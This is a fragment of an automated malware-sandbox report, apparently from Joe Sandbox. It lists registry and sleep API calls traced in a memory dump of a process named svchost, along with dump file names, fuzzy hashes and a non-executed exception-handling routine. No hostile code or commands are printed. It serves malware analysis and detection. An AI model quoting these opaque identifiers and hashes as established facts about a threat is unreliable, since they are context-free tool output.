                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1754
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD176F
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD178F
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD17AA
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD17CA
                                                          • SleepEx.KERNELBASE ref: 0000014E41FD1AE3
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD17E5
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1805
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1820
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1840
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD185B
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD187B
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1896
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD18A0
                                                          Memory Dump Source
                                                          • Source File: 00000045.00000002.3450162698.0000014E41FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                          • Associated: 00000045.00000002.3450007037.0000014E41FD0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000045.00000002.3450405001.0000014E41FE6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000045.00000002.3450622589.0000014E41FF1000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000045.00000002.3450819633.0000014E41FF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000045.00000002.3451030485.0000014E41FF9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_69_2_14e41fd0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction ID: 0bf38f625baa4da5b2f8a37b5dd4c850af0574279057b7cf903c9f482d4796ef
                                                          • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction Fuzzy Hash: 2331F971718A0182FF509B66DA593FAA3E4BF84BD0F4C51219E4BC76B6EF64C8528370

                                                          Non-executed Functions

                                                          Function 0000014E41FA9D74 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000045.00000003.2231913807.0000014E41FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_69_3_14e41fa0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction ID: 0ed9ac66414087d513027ed7df3d5ae234fbd591406b529314a60a7205f700b2
                                                          • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction Fuzzy Hash: 8CE15732704B408AEF609B6594883DDB7E0FB45BC8F1C4115EE8997FAADB38D596C720